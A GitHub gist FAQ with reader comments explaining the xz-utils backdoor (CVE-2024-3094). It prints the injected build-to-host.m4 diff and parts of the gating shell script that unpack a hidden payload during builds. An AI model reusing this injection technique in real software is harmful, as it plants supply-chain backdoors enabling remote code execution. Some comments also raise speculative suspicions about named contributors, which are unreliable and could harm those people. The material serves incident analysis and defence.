
@thesamesam
Last active December 3, 2024 05:06
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in it is written in good faith and believed to be accurate, but we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software providing lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; statistically, your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known, specific criteria are met. Others may yet be discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild, where it gets activated by connections - resulting in performance issues - but we do not yet know what is required to bypass authentication (etc.) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

Without scaremongering, it is important to be clear that at this stage we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL;DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If any of the above applies to you, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.
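As a quick first check on a given machine, you can look at the version string xz reports (a minimal sketch; your distro's package manager, e.g. `dpkg -s xz-utils` or `rpm -q xz`, is the more authoritative source):

```shell
# Flag the two known-backdoored releases by version string.
check_xz_version() {
  case "$1" in
    5.6.0|5.6.1) echo "WARNING: known-backdoored xz release $1 - update now" ;;
    *)           echo "xz $1 is not one of the known-bad releases" ;;
  esac
}

# On a live system, feed it the real version, e.g.:
#   check_xz_version "$(xz --version | awk 'NR==1 {print $NF}')"
check_xz_version 5.6.1
```

Note this only checks the version number; it says nothing about whether the backdoor was ever reachable on your system.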

This is not a fault of sshd, systemd, or glibc; that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally, upstream publishes release tarballs that are different from the automatically generated ones on GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
    exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
    exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
    exit 0
  fi

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thus seems to be targeted at amd64 systems running glibc on Debian- or Red Hat-derived distributions. Other systems may be vulnerable, but we don't know yet.
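Taken together, a hedged reconstruction of the combined gating logic looks like this (a self-contained sketch; the values are stand-ins for what configure would actually set):

```shell
# All gates from the snippets above, collapsed into one check.
# Stand-in values; in the real script these come from configure.
build="x86_64-pc-linux-gnu"              # canonical build triplet
GCC="yes"; CC="gcc"
ld_version="GNU ld (GNU Binutils) 2.40"  # stand-in for `$LD -v` output
srcdir="."
RPM_ARCH="x86_64"

if echo "$build" | grep -Eq "^x86_64" &&
   echo "$build" | grep -Eq "linux-gnu$" &&
   test "x$GCC" = "xyes" && test "x$CC" = "xgcc" &&
   echo "$ld_version" | grep -q 'GNU ld' &&
   { test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64"; }
then
  echo "all gates passed: payload would be unpacked"
else
  echo "a gate failed: build left untouched"
fi
```

Here every gate passes, so it takes the first branch; flip any stand-in (say, `build="aarch64-unknown-linux-gnu"`) and the build is left alone.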

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl
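Two of the tricks in the injected m4 above can be demonstrated with benign stand-ins: the `grep` that locates the payload carrier (any file whose content ends in four `#`s, five alphanumerics, four `#`s), and the `gl_path_map` byte swap (tabs/spaces and dashes/underscores exchanged), which in the real attack turns the deliberately "corrupt" carrier's bytes back into a valid xz stream:

```shell
# 1. The grep from gl_BUILD_TO_HOST_INIT: find a file whose content ends
#    with a ####xxxxx#### marker (here, a harmless stand-in file).
tmp=$(mktemp -d)
printf 'binary-looking garbage ... ####Hello####' > "$tmp/innocent-test-file"
grep -aErls "#{4}[[:alnum:]]{5}#{4}$" "$tmp"   # prints the stand-in's path

# 2. The gl_path_map substitution (tab<->space, "-"<->"_"). It is applied
#    to the carrier's bytes in the real attack; applied to the carrier's
#    actual filename it illustrates the same swap:
echo "bad-3-corrupt_lzma2.xz" | tr "\t \-_" " \t_\-"
# -> bad_3_corrupt-lzma2.xz
```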

Payload

If those conditions are met, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know what the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd; it is just unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).
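To see whether your sshd would pull liblzma into its process via direct linking (a quick, hedged check; paths vary by distro, and it does not cover libraries loaded later via dlopen):

```shell
# Does the sshd binary directly link liblzma or libsystemd?
sshd_path=$(command -v sshd || echo /usr/sbin/sshd)
ldd "$sshd_path" 2>/dev/null | grep -E 'liblzma|libsystemd' \
  || echo "no direct liblzma/libsystemd link found for $sshd_path"
```

An empty grep result only rules out a direct link; the whole point of the dlopen discussion above is that indirect loading can still happen.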

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a stray . in the CMake check for landlock sandboxing support. This caused the check to always fail, so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns that some other projects are affected (either compromised themselves, or changed to facilitate the xz backdoor). I want to avoid a witch-hunt, but I'm listing some examples here which have already been widely linked, to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both reverse engineering and OSINT). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils are supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything other than wait for connections for RCE, such as:
        • calling home (sending found private keys, etc.)
        • loading/executing additional rogue code
        • taking other steps to infect the system (adding users, authorized_keys, etc.) - or whether it can be said with certainty that it did not
      • attack vectors other than via sshd were possible
      • people who had the compromised versions can feel fully safe if sshd was either not running or at least not publicly accessible (e.g. behind a firewall, NAT, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projects which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???
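For the "diff golden tarballs against the git tag" item, the core of such a check might look like this (a toy, self-contained sketch; the repo, tag, and tarball here are stand-ins for the real distro inputs):

```shell
set -e
work=$(mktemp -d); cd "$work"

# Toy "upstream" repo with one tagged release.
git init -q repo
cd repo
echo 'int main(void){return 0;}' > main.c
git add main.c
git -c user.email=a@example.org -c user.name=a commit -qm release
git tag v1.0
cd ..

# A "release tarball" that smuggles in an extra file next to the real source.
mkdir dist
cp repo/main.c dist/
echo 'injected' > dist/build-to-host.m4
tar -czf release.tar.gz -C dist .

# Compare the tag's contents with the tarball's contents.
mkdir from-git from-tarball
git -C repo archive v1.0 | tar -x -C from-git
tar -xzf release.tar.gz -C from-tarball
diff -r from-git from-tarball || echo "tarball does not match the tag"
```

In practice you would also need to whitelist the files autotools legitimately generates for dist tarballs (configure, Makefile.in, etc.) - which is exactly the noise the attacker hid in.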

References and other reading material

@duracell

duracell commented Apr 4, 2024

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

So, unless you really know what you're doing, IPv4 is the only way to go. Because being behind NAT gives a default opt-in behavior to accepting connections. On other hand, IPv6 emphasizes direct connectivity, so it's much easier to accidentally backdoor a private network by exposing sensitive services, meant to be run privately to public internet.

And xz-utils situation shows that moving to IPv6 would just expose you to more security risks and headaches (for example, I had xz 5.6.1 on one machine, but thankfully, I was using IPv4 and for this particular machine I didn't expose sshd to public internet).

The device which does NAT on IPv4 could be - and in every case I know of, is - also the device which does the filtering for IPv6, and by default on all consumer products it does not allow any incoming connection requests. So you have the same firewall security as with NAT, but without port translation and its attendant problems.

@Daniel15

Daniel15 commented Apr 4, 2024

Some of the commit links still go to the GitHub mirror at https://github.com/tukaani-project/xz/, which is still disabled. It'd be worth updating the links to go to the upstream repo, e.g. https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

@redcode

redcode commented Apr 4, 2024

Has anyone tried to contact Chien Wong? He could have spoken privately with Jia Tan, and if so, he could have tried to communicate with him in Chinese. That might lead us to some other possible clue.

@dnorthup-ums

@sectosec

The serious part is that the guy named Neustradamus also pressured to push the liblzma update to 5.6.0; check: microsoft/vcpkg#37197

FWIW: microsoft/vcpkg#37199 (comment)

I have no assessment either way, but just thought it worth noting...
Then again, I've also managed to get banned from gulp for pointing out that they were shipping insecure code. I've been a FLOSS project lead before, so I know it can be ultra hard to figure out who to trust and how much to trust them. (This is my $Dayjob github account, not my personal one... and much of my involvement in Open Source stuff predates github anyway.)

@AdrianBunk

Just came here to throw some links:

When someone creates a Github account solely for smearing another user, then the most suspicious person is the accuser.

After a quick look I would agree with opinions expressed elsewhere that the accused person is a bit weird, but the only connection with xz is one xz update request in one project.
"weird" includes "opened 2900 Github issues/MRs in the past 5 years", so when the accuser found a case where "a 2nd account comes in and asks for the feature" 3 months later there's no surprise that this has happened somewhere.

It would be good if everyone here refrains from participating in a witch hunt based on anonymous smearing.

@donington

As much as I have loved the discussions brought up in this thread, I would like to see it become more centered on the task at hand - the xz code situation. Everything that people have been mentioning is interesting, but a lot of it has lost focus on the task here.

I'd like to try to submit as fact that sshd was targeted - not because it was directly weak. The sideline came from an outside code base, mostly patched in. The flaw was partly that it was a network service that provided a way in: the listening socket.

@christoofar

There is so much fan-boyism going on here that you will never get a consensus that all systems without systemd couldn't possibly have this problem.

I'm not trying to "defend the BSDs" here. So don't look at it that way. Again, there's not a realistic magic thing that will stop unwanted hotloading, not even over at the "secure" OSes.

xz has taught me to get more bitchy about hotloading that I don't like. I feel that anyone sassing someone for asking "Why did you bring that in?" - whether in a FOSS discussion, at work, etc. - is themselves a red flag. Just explain why you brought the dep in, and if you get an "ugh... maybe a security concern?", then do the research. Look and see. Stop being a jerk.

Trying to play this unitary blame game thing is going nowhere, so we meet here.

The fact that tests were done on a compromised system with all the necessary conditions/ingredients - but sshd was started manually and no backdoor was found - seems to have gone over everyone's head.

On the RE chats/Discords, the resistance the .o has to being observed - and the great find that endbr calls are really being used as tokens to locate the calling points - is genius.

(S/O to Stephano for figuring out how the locator works https://smx-smx.github.io/xzre/xzre_8h.html#details)

Meanwhile, everyone is talking xz/lzma and distros are rebuilding packages, but zstd is still being built - or hasn't been rebuilt since 3/29 - from a preconfigured GitHub tarball with lzma enabled (or is it not everyone doing this?).

libsystemd also put dlopen() around zstd too. This backdoor is one of the craftiest things ever to have been written. Every decompiler shop is going to be studying this for months/years. We may need to think about asking the chipset makers themselves for help. No doubt many of them have also been thinking about this, and worrying about their own machines.

You wanted automation and less sysadmin work, you looked down on custom scripts to set up services... here it came. If you leave honey out, the bees and the ants will come.

Amen. Also did you notice OWASP themselves got a breach? https://therecord.media/owasp-foundation-warns-of-data-breach-resumes

@thesamesam
Author

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@christoofar

christoofar commented Apr 5, 2024

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@thesamesam 10-4.

On the RE effort, I am wondering whether, in the dumpouts that Jia saw from Gentoo/Debian, one of the x86_64 registers was being used as a debug marker.

Force-flipping registers (though for Jia, it's going to be done in an obfuscated way) is a common technique from old assembly programming, back when computers had big light boards and a STOP/RUN switch somewhere so you could inspect values by hand, as we all know. Focus has been so much on hunting down all the symbols, but now I think valgrind with the full register dump turned on, across a bunch of projects that screamed on 5.6.0, might reveal something that's been missed. I'm off to go work on that and shut up on here :-)

@Leseratte10

I don't think there's currently any hints that the malware itself is doing that - but if you had the SSH port exposed it's possible that the attacker has abused the malware to get code execution on your machine and could then have installed or changed whatever he wanted, so if you want to be absolutely safe you'd need to reinstall.

@fiorins

fiorins commented Apr 5, 2024

Could GitHub add a check that tarballs are created from the code hosted on the platform?

@AdrianBunk

Could GitHub add a check that tarballs are created from the code hosted on the platform?

Please read the "Design" section in the FAQ where this topic is explained.

(And note that the tiny part of the backdoor that was only in the release tarballs could just as well have been in git like the rest of the backdoor - everything in git was also under the control of the attacker.)

@rifkidocs

just want to leave a trace here

@ZacharyDK

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

@AdrianBunk

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

Read the links under "Analysis of the payload", where people discuss the payload and how they have analyzed it.

@anzz1

anzz1 commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to the kernel or core utilities. Stability and safety are much more important than shiny new features, especially if Linux is to be the stable foundation for server and embedded applications running critical code in the future. I really hope any people bullying maintainers into accepting patches and new features for already perfectly functioning tools will be called out more often. If you desperately want a new feature, fork it and make your own.

I hope that people would understand to look back into what Linux was and what the core idea of it is, which I would describe as a collection of simple utilities (GNU) and the kernel to support them. Not anything else, everything that is complex, hard or time-consuming to audit, new feature that is controversial, should not be included in either the kernel, core utilities or major distros as default. You are not supposed to create these large monoliths like systemd which span their tentacles to the entire system and introduce not only a complex large codebase addition but also a single point of failure.

I also hope that the reflection from this isn't that we need more idiotic "mitigation" security features like AppArmor, position-independent-executables, stack canaries/protectors and such other band-aid "fixes" which create additional complexity that does not only hurt performance but is also fertile ground for new security holes and bugs to fester.

The only sane and safe way is to make the kernel and core utilities simple and lean so they are easy to audit, lift your foot from the pedal a bit so everything can be checked at least with several sets of eyes before moving forward. There is no need for any "mitigations" when the code itself is safe.

Also, the whole community needs to not succumb to the vanity of any person or group who pushes hard to get their personal pet projects merged into the foundation that everyone uses. As much software as possible should be built on top of Linux, as packages which can be installed like it has always been - not into Linux, either in the kernel or as kernel patches or packages included by default in major distributions. The more of a "blank slate" a base Linux installation is by default, the better off everyone is. This is especially true for distributions which are focused on serious use, like Debian. Most people, and in turn the infrastructure they create, use major distributions as a base, so the decisions made by major distributions also have a great impact - so not only the kernel team must be vigilant.

If you look at the kernel mailing list, Torvalds has been active in fighting against the tide of many people trying to push all kinds of bullshit into the kernel source tree. But the major distributions, to my (limited) knowledge, don't have such a strong gatekeeper, and all the distros are getting increasingly bloated and include more and more unnecessary features by the day. Also, Torvalds will eventually retire - what will happen then, who will fight against the tide? That not only makes me scared for the future of Linux, but also shows that it's not a good idea to rely on a single gatekeeper to keep all the bullshit out. I mean, over a decade ago there was a serious push to move the Linux kernel to C++, which Torvalds promptly stopped in its tracks, thank god. Where would we be without people pushing back and wanting to contemplate first? We need more of those people as maintainers in the OSS community - the critical thinkers and the slow-and-steady types.

How could the OSS community at large have the reflection, when it comes to critical foundations, that everything needs to be handled with proper care - which means taking your time, and not every feature needs to make it in just because it's new and shiny? The problem at large is that the group who want "feature X" added are usually loud and obnoxious and push hard, while most people who think "is this really necessary?" either say nothing out of politeness or don't care enough. Then, even when maintainers think so, it's easy to fall for the psychological effect of "oh, this must be what people really need" and get bullied into merging a new feature without proper checks and balances. Rinse and repeat a hundred times, and suddenly the distribution has become much more bloated and harder to audit, because a hundred new features - each of which some person might just maybe need sometime - have been added as defaults.

TL;DR: Everyone who is a developer on any critical software like the kernel, core utilities, major distributions of Linux, etc.: take your time. The world will not end if a new feature doesn't get added tomorrow. It just might, though, if you add something in a hurry. You don't owe anyone anything - especially not someone bugging you to immediately add "feature X" because some small subset of users might want to use it.

@Z-nonymous

Z-nonymous commented Apr 5, 2024

Wait until snaps and flatpaks are properly exploited. 😂

@Aqa-Ib

Aqa-Ib commented Apr 5, 2024

Well said, anzz1. You can even extrapolate what you said to everything that human society does. It is practically impossible to stop this crazy development that we have as a whole. However, those individuals who make things carefully can be of great value for our future.

@Daniel15

Daniel15 commented Apr 5, 2024

Could GitHub add a check that tarballs are created from the code hosted on the platform?

GitHub already has built-in support for generating tarballs based on a tag (for example, https://github.com/Daniel15/prometheus-net.SystemMetrics/archive/refs/tags/v3.1.0.tar.gz). This is guaranteed to match the code in source control.

The issue is that sometimes the tarballs legitimately differ from the repo contents, particularly if the project uses automake. However, this is not ideal, and projects should strive to have reproducible builds, meaning the code to build the project is exactly the same as the code checked in to source control, and building the code from source always produces the same binary (so anyone can build the project from source to verify that a precompiled executable was built from the same source code, as it'll be exactly identical). One of the more common issues with achieving reproducible builds is timestamps, for example if the current build time is embedded in the executable.

Having said that, as others have mentioned, that wouldn't have helped here. The attacker was in full control of the source control repo, and could have just put everything in there rather than just in the tarball.

@Daniel15

Daniel15 commented Apr 5, 2024

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

@bogd IPv6 does help though. Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56), and you can run your SSH server on a random IP in the middle of the range. Just stick the IP in an internal-only DNS zone and don't expose the DNS record publicly. That's far less likely to be found during a scan, compared to IPv4 where the entire public IPv4 range can be scanned in 5-15 minutes (https://github.com/robertdavidgraham/masscan).

Sure, it's security through obscurity and thus isn't a proper security measure, but I've been running a honeypot server in one of my /64 ranges for a few years and so far nobody has hit it. IPv6 traffic to some of my sites is around 45% of total traffic, so people are using IPv6 otherwise 🙂
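The scale difference above can be made concrete with back-of-envelope arithmetic. The probe rate below is an assumption (roughly the order of magnitude masscan advertises on good hardware), not a measured figure:

```python
# Rough scan-time comparison: all of IPv4 vs. a single IPv6 /64.
ipv4_space = 2**32          # entire IPv4 address space (upper bound)
slash64_space = 2**64       # addresses in one IPv6 /64
rate = 10_000_000           # probes per second (assumed scanner speed)

ipv4_minutes = ipv4_space / rate / 60
slash64_years = slash64_space / rate / (60 * 60 * 24 * 365)

print(f"IPv4: roughly {ipv4_minutes:.0f} minutes to sweep")
print(f"one /64: roughly {slash64_years:,.0f} years to sweep")
print(f"a /64 holds {slash64_space // ipv4_space:,}x the IPv4 space")
```

Even a scanner a thousand times faster would still need tens of years per /64, which is why brute-force discovery of a single hidden host is impractical; the caveat is that this only raises the cost of untargeted discovery, it is not access control.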

@ormaaj

ormaaj commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to the kernel or core utilities.

This was caught as early as it was thanks entirely to the abundance of people testing new release code in a wide variety of environments. That is made possible by downstream distributors that integrate test packages into their systems so they are easily available. Testers of upstream prerelease code had no opportunity to find this.

This is the system working exactly as it should.

@fatience

fatience commented Apr 6, 2024

Neustradamus's behaviour is indeed suspicious.
https://news.ycombinator.com/item?id=39868682

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, without any stated motive or proper argument other than "they use it as well" (meaning projects he convinced beforehand).

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Someone more experienced with this should definitely take a look.

@bogd

bogd commented Apr 6, 2024

@bogd IPv6 does help though.

No arguments there - it does help, it's just not the panacea that some people think it is :)

Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56)

There's a very nice conversation here about how allocating 1 trillion times the entire IPv4 address space for a single server is "a good idea" (TM). I am old enough to remember the days when we allocated an IPv4 /8 for a single network, because "the address space is so large, it is practically infinite". But as I was saying, I do not want to sidetrack this conversation into other topics - the original one is far too important.

Sure, it's security through obscurity and thus isn't a proper security measure

That was my entire original point. Maybe that, plus what others have added:

  • IPv6 would not have protected against an application-level backdoor
  • this attack does not look like something that would be used against random targets, discovered during a "routine" scan. Looks more like something one would save to use against extremely high-value, known targets. I know, assumption, but... not an illogical one.

@AdrianBunk
AdrianBunk commented Apr 6, 2024

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

You should read the links provided by this person; they are proposals for upcoming internet standards.

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Mozilla accepted an implementation from someone else that covered a major part of the original request, which is a strong indication that the request made sense.

please do not respond to closed bugs asking for additional features. Please file a separate bug for new features.

That's a very common mistake, nothing suspicious about that.

behaviour is indeed suspicious.

It can be really harmful when people who clearly have no experience interacting with users in open source projects make such bold accusations; it happens far too often that a brainless internet mob drives innocent people to suicide.

@thesamesam
Author

thesamesam commented Apr 6, 2024

I am familiar with that person (though I don't know him), and my take has always been that he's enthusiastic but ends up irritating a lot of people (me included) because of how he goes about things. I don't think he's malicious; he just ends up causing hassle for FOSS maintainers. This situation is cause to pause and reflect on behaviour, but I don't think people should be chasing after him.

@Chestnuts4

Chestnuts4 commented Apr 6, 2024

Sorry, I want to know how I can get xz-5.6.1.tar.gz, so that I can diff it the same way you did:

git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
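One practical note on the command above: when the two files live outside the current repository's working tree, `git diff` needs the `--no-index` flag to compare arbitrary paths. A minimal self-contained demo (the file contents below are made up for illustration, not the real m4 macro):

```shell
# Scratch directory with two versions of a file, one carrying an extra line.
tmp=$(mktemp -d)
printf 'AC_DEFUN([gl_BUILD_TO_HOST], [...])\n' > "$tmp/original.m4"
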